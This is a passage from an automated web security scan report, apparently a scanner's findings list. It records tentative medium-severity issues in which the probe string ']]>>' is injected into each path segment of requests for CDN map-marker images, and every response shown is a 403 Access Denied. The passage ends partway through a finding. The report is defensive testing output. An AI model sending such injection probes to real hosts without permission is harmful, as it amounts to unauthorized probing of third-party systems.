<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>301F2BF9BC988511</RequestId><HostId>okOT+aukvO9gWm2huDe4R+1Gbyxjgxux0b9FGIiKiYcI2z2O0v
...[SNIP]...

8.102. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-663333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 28C0BA480CF00508
x-amz-id-2: +y0x/8vyrQ8Lhg78qhrIIWku4qMHcKnfiUn6kqHwGJHpiqfctq/CXTLwK04PVTzu
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:59 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7daa3a6aebaf1ed5374b2268094f848bc1a742c4be8d5b31cdfc62ca5a64ac048ec3b0c39e6bb678
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>28C0BA480CF00508</RequestId><HostId>+y0x/8vyrQ8Lhg78qhrIIWku4qMHcKnfiUn6kqHwGJHpiqfctq
...[SNIP]...

8.103. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-663333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F56DBE9BC62E4800
x-amz-id-2: Zz1O/YAK6J/0YDg/vf+BL6rU7NLE/A4eBu+bX8Oevf4xqgIXpFdkO6nJuLm/CmcJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:11 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f11308a4d17ad195ffc40ed27361a7e6a749e9691ca9093e0ebc79f39ea265340934e9ece0409398
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F56DBE9BC62E4800</RequestId><HostId>Zz1O/YAK6J/0YDg/vf+BL6rU7NLE/A4eBu+bX8Oevf4xqgIXpF
...[SNIP]...

8.104. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-663333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FE4F4B23CB3BBE68
x-amz-id-2: laz31JBpy+X8XDcTJ3qGfs3A7EgPjNCOQakP3nx+nIMp5DipSUQUyHpLcO8tjodh
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:17 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 124b70105e3ed77700ea547ff37bd26a15fbb53d199acf86991ee4ea90a6989675042b1c84a0e723
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FE4F4B23CB3BBE68</RequestId><HostId>laz31JBpy+X8XDcTJ3qGfs3A7EgPjNCOQakP3nx+nIMp5DipSU
...[SNIP]...

8.105. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7479C788C3AF8D5D
x-amz-id-2: XDv1vsUSblAlIHWhWmkFqTjmqCEpF/18UGnUlNpVd8EnvRBKg5DKhU/q2Qk1WQE0
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8291f8e26c23bf0113f70da359ca763870633d35a57ac2a5382f2582e829c781c0b4e56fd6f607f3
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7479C788C3AF8D5D</RequestId><HostId>XDv1vsUSblAlIHWhWmkFqTjmqCEpF/18UGnUlNpVd8EnvRBKg5
...[SNIP]...

8.106. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-993333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7AC5FCFD2A65E078
x-amz-id-2: lmj+XTfT9doKgx84qqMt4LUrEJoLAWQNgXcWxtO8jNLkk3sFBE8+g+3Rek4qzsK9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 91e166d303f498a8f8df5ccb55626c7d8a26ac6b9eef3c1dac8fdcaaad5ab4471d93c646fa558687
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7AC5FCFD2A65E078</RequestId><HostId>lmj+XTfT9doKgx84qqMt4LUrEJoLAWQNgXcWxtO8jNLkk3sFBE
...[SNIP]...

8.107. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-993333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8BAFF9D3467A1D57
x-amz-id-2: YpbPjTvjQ3mEOoIdY8uRUFw5CseQjDHp3Nvt+8Gu1W/QHZAYOE5Zwxy26FeysXIU
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4e07b71697d1f340f0959032f040fefc49dc36070d0b4f753cadf8a90fdff71b2d9c0c21e90512e1
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8BAFF9D3467A1D57</RequestId><HostId>YpbPjTvjQ3mEOoIdY8uRUFw5CseQjDHp3Nvt+8Gu1W/QHZAYOE
...[SNIP]...

8.108. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-993333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3E190A0E74D9C09A
x-amz-id-2: CK0van+J+Ir7ejK417navPUxItMrvU5M1Rt4nCHnqoEM8nfMrkouiK+f8C45niTt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f8abc0e4a76c636f20219f427f54fb7a12e2ecaf95230e1b5f9fdabeabfaac084db5eed20523dfe5
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3E190A0E74D9C09A</RequestId><HostId>CK0van+J+Ir7ejK417navPUxItMrvU5M1Rt4nCHnqoEM8nfMrk
...[SNIP]...

8.109. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 522DF9013F7C1318
x-amz-id-2: oISnN83tsh96kgdYTj/j3Rvwz6heb5IyiHcXo71gyPWhRfyggCEAzHdpRSKleaJF
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8385d58f941464442d2d2688aa73cefece2537c737c81ab04b8e2063066317bcfa6cb4f17d3eb6cd
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>522DF9013F7C1318</RequestId><HostId>oISnN83tsh96kgdYTj/j3Rvwz6heb5IyiHcXo71gyPWhRfyggC
...[SNIP]...

8.110. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-993333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5E949AB4B11A6E68
x-amz-id-2: fbb5bvpHp+AuSmHz4GzFDGmcBr5Pa2WX8kztyYlXiKljHJvYWllGmhvx5VTNeTEH
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: cd76b6f34d8858800e36d3d1490bdc0764604f9a469a5ddc305fc340233af6c474de77c8a6bd6083
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5E949AB4B11A6E68</RequestId><HostId>fbb5bvpHp+AuSmHz4GzFDGmcBr5Pa2WX8kztyYlXiKljHJvYWl
...[SNIP]...

8.111. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-993333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 60592F3EDEB79511
x-amz-id-2: vlBhHQ1fnHVJFT+sRrAc82Q9tyGrMseT5BqpgeB4IC/1BO62aIQnR5YFERrgP+7w
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:14 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c1d261677678a28606330d3b4f655b4410b79bcd15efd16ed7efe01d848799f7d9b99b704e15dedc
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>60592F3EDEB79511</RequestId><HostId>vlBhHQ1fnHVJFT+sRrAc82Q9tyGrMseT5BqpgeB4IC/1BO62aI
...[SNIP]...

8.112. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-993333-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DC2FE9B864B55911
x-amz-id-2: J/Wy7rxA/WSRSXQLcq8s6ruH5FVpXo64VRSkecvYm8Lyx9DhLyRMDXgO7XXt7hmx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 34677d1344794b470439912656d9c519f9313ea3db3cd6e537b9c36a08c7052c30df9f962f1060c1
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DC2FE9B864B55911</RequestId><HostId>J/Wy7rxA/WSRSXQLcq8s6ruH5FVpXo64VRSkecvYm8Lyx9DhLy
...[SNIP]...

8.113. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C87A72C21066702E
x-amz-id-2: Ax/81E3dz4DiaGq9siwPzxRKUL+QSsyhM+mNlcf9PBDXNJNCBSgJqu8OTlUdJdpJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3e78ca52bd16311b4f14aa8fc9f7736680831187985ee2c8275d733283dff6cff071ca562ee8e581
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C87A72C21066702E</RequestId><HostId>Ax/81E3dz4DiaGq9siwPzxRKUL+QSsyhM+mNlcf9PBDXNJNCBS
...[SNIP]...

8.114. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-cc3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 13BB4A353E49315A
x-amz-id-2: 8UfyZ0YAFc2I9kum2o+c5YMNfG3LNW9ygPHjSDKwclWOLHnterHjLF3Bea2k1QJA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 07a11db9d301ab6bf10bdc6d682bd29face394ba538d66b54a151079057752931c303efc54a491fe
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>13BB4A353E49315A</RequestId><HostId>8UfyZ0YAFc2I9kum2o+c5YMNfG3LNW9ygPHjSDKwclWOLHnter
...[SNIP]...

8.115. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-cc3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5EEE81428B4B2039
x-amz-id-2: xTUy4mX8BfoTOIteCVai648AbrovgypLX87KqEiPD0u712N318xhQHW0Sz7T41Q7
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:08 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b6fe52fee06eefc06585c40911749882e18fb07143a084b42af1d0b95587ee801e92dc2dd707a6ff
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5EEE81428B4B2039</RequestId><HostId>xTUy4mX8BfoTOIteCVai648AbrovgypLX87KqEiPD0u712N318
...[SNIP]...

8.116. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-cc3333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4D26063BF8FA7B0B
